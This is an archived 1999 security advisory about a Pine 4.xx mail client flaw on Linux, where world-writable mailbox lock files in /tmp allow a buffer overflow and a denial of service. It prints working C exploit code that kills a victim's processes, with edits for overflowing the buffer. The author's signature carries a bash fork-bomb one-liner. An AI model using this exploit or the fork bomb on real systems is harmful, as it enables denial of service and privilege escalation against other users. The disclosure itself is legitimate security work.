TUCoPS :: Linux :: Apps N-Z :: pine_4~1.txt

Pine 4.xx Overflow (Linux) 

Date: Sun, 7 Mar 1999 01:41:25 +0100
From: Michal Zalewski <lcamtuf@IDS.PL>

Overflow in pine 4.xx (Linux)

pine 4.xx, at least on Linux platform, have serious security hole.
When data is read from so-called mailbox lock created in /tmp directory
(this happens under certain conditions - please refer exploit code below),
it's stored in _too_small_ buffer. It is possible to overwrite some data,
and registers as well. For testing purposes, simple exploit code presented
below (vunerabilities 3 and 4) could be used - suggested changes:

write(i,"-1",2)   ->   write(i,"(about 1100 b)",1100)
truncate(i,2)     ->   truncate(i,1100);

Overflow in pine might be used to gain other lusers' privledges (or,
sometimes, root privledges, depending on his stupidity ;-).

Solution: you have to look for something like kill(i,SIGUSR2) in sources 
and modify lines just before it ;>


The problem is probably well known, but silently ignored by pine vendors.
Unfortunately, it's possible to turn 'mostly harmless feature' in
something nasty - following code allows various DoSes by killing all
processes of luser (could be root?) every time he/she runs pine or
receives mail via POP3 protocol:

-- lock-exploit.c --
// Pine 4.xx, ipop3d 4.xx and other /tmp-lock based mail stuff.

#include <sys/file.h>
#include <sys/stat.h>
#include <unistd.h>

main(int argc,char* argv[]) {
  int i,a=0;
  char s[100];
  struct stat x;
  if (!argv[1]) exit(printf("Usage: %s account_name\n",argv[0]));
  sprintf(s,"/var/spool/mail/%s",argv[1]);
  if (stat(s,&x)) exit(printf("Mailbox (%s) not found.\n",s));
  sprintf(s,"/tmp/.%x.%x",(int)x.st_dev,(int)x.st_ino);
  fchmod(i=open(s,O_RDWR|O_CREAT,0600),0666);
  while (1) {
    lseek(i,0,0);
    write(i,"-1",2);
    ftruncate(i,2);
    fsync(i);
    if (!a++) if (!flock(i,LOCK_EX)) printf("Got lock on %s.\n",s);
      else printf("File %s already locked, wait...\n",s);
    sleep(1);
  }
}
-- eof --

Works well under Linux. Under BSD, pine seems to have broken mailbox
access negotiation (fortunately ;-). No information about ipop3d.

Mainly, this vunerability demonstrates that world-writable mailbox locks
in /tmp are SICK IDEA (one day, as I recall, one of pine vendors said it's
'harmless', while other solutions allows several DoS attacks... huh).


_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [link / marchew] [dione.ids.pl SYSADM]
[Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH